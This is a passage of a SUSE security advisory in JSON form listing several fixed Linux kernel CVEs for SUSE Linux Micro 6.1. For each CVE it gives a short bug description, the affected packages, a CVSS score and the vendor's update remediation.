"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54189"
},
{
"cve": "CVE-2023-54194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: use kvmalloc_array/kvfree instead of kmalloc_array/kfree\n\nThe call stack shown below is a scenario in the Linux 4.19 kernel.\nAllocating memory failed where exfat fs use kmalloc_array due to\nsystem memory fragmentation, while the u-disk was inserted without\nrecognition.\nDevices such as u-disk using the exfat file system are pluggable and\nmay be insert into the system at any time.\nHowever, long-term running systems cannot guarantee the continuity of\nphysical memory. Therefore, it\u0027s necessary to address this issue.\n\nBinder:2632_6: page allocation failure: order:4,\n mode:0x6040c0(GFP_KERNEL|__GFP_COMP), nodemask=(null)\nCall trace:\n[242178.097582] dump_backtrace+0x0/0x4\n[242178.097589] dump_stack+0xf4/0x134\n[242178.097598] warn_alloc+0xd8/0x144\n[242178.097603] __alloc_pages_nodemask+0x1364/0x1384\n[242178.097608] kmalloc_order+0x2c/0x510\n[242178.097612] kmalloc_order_trace+0x40/0x16c\n[242178.097618] __kmalloc+0x360/0x408\n[242178.097624] load_alloc_bitmap+0x160/0x284\n[242178.097628] exfat_fill_super+0xa3c/0xe7c\n[242178.097635] mount_bdev+0x2e8/0x3a0\n[242178.097638] exfat_fs_mount+0x40/0x50\n[242178.097643] mount_fs+0x138/0x2e8\n[242178.097649] vfs_kern_mount+0x90/0x270\n[242178.097655] do_mount+0x798/0x173c\n[242178.097659] ksys_mount+0x114/0x1ac\n[242178.097665] __arm64_sys_mount+0x24/0x34\n[242178.097671] el0_svc_common+0xb8/0x1b8\n[242178.097676] el0_svc_handler+0x74/0x90\n[242178.097681] el0_svc+0x8/0x340\n\nBy analyzing the exfat code,we found that continuous physical memory\nis not required here,so kvmalloc_array is used can solve this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54194",
"url": "https://www.suse.com/security/cve/CVE-2023-54194"
},
{
"category": "external",
"summary": "SUSE Bug 1255974 for CVE-2023-54194",
"url": "https://bugzilla.suse.com/1255974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54194"
},
{
"cve": "CVE-2023-54201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/efa: Fix wrong resources deallocation order\n\nWhen trying to destroy QP or CQ, we first decrease the refcount and\npotentially free memory regions allocated for the object and then\nrequest the device to destroy the object. If the device fails, the\nobject isn\u0027t fully destroyed so the user/IB core can try to destroy the\nobject again which will lead to underflow when trying to decrease an\nalready zeroed refcount.\n\nDeallocate resources in reverse order of allocating them to safely free\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54201",
"url": "https://www.suse.com/security/cve/CVE-2023-54201"
},
{
"category": "external",
"summary": "SUSE Bug 1255964 for CVE-2023-54201",
"url": "https://bugzilla.suse.com/1255964"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54201"
},
{
"cve": "CVE-2023-54204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: sunplus: fix return value check of mmc_add_host()\n\nmmc_add_host() may return error, if we ignore its return value,\n1. the memory allocated in mmc_alloc_host() will be leaked\n2. null-ptr-deref will happen when calling mmc_remove_host()\nin remove function spmmc_drv_remove() because deleting not\nadded device.\n\nFix this by checking the return value of mmc_add_host(). Moreover,\nI fixed the error handling path of spmmc_drv_probe() to clean up.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54204",
"url": "https://www.suse.com/security/cve/CVE-2023-54204"
},
{
"category": "external",
"summary": "SUSE Bug 1255967 for CVE-2023-54204",
"url": "https://bugzilla.suse.com/1255967"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54204"
},
{
"cve": "CVE-2023-54207",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54207"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: uclogic: Correct devm device reference for hidinput input_dev name\n\nReference the HID device rather than the input device for the devm\nallocation of the input_dev name. Referencing the input_dev would lead to a\nuse-after-free when the input_dev was unregistered and subsequently fires a\nuevent that depends on the name. At the point of firing the uevent, the\nname would be freed by devres management.\n\nUse devm_kasprintf to simplify the logic for allocating memory and\nformatting the input_dev name string.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54207",
"url": "https://www.suse.com/security/cve/CVE-2023-54207"
},
{
"category": "external",
"summary": "SUSE Bug 1255961 for CVE-2023-54207",
"url": "https://bugzilla.suse.com/1255961"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54207"
},
{
"cve": "CVE-2023-54209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix blktrace debugfs entries leakage\n\nCommit 99d055b4fd4b (\"block: remove per-disk debugfs files in\nblk_unregister_queue\") moves blk_trace_shutdown() from\nblk_release_queue() to blk_unregister_queue(), this is safe if blktrace\nis created through sysfs, however, there is a regression in corner\ncase.\n\nblktrace can still be enabled after del_gendisk() through ioctl if\nthe disk is opened before del_gendisk(), and if blktrace is not shutdown\nthrough ioctl before closing the disk, debugfs entries will be leaked.\n\nFix this problem by shutdown blktrace in disk_release(), this is safe\nbecause blk_trace_remove() is reentrant.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54209",
"url": "https://www.suse.com/security/cve/CVE-2023-54209"
},
{
"category": "external",
"summary": "SUSE Bug 1255963 for CVE-2023-54209",
"url": "https://bugzilla.suse.com/1255963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
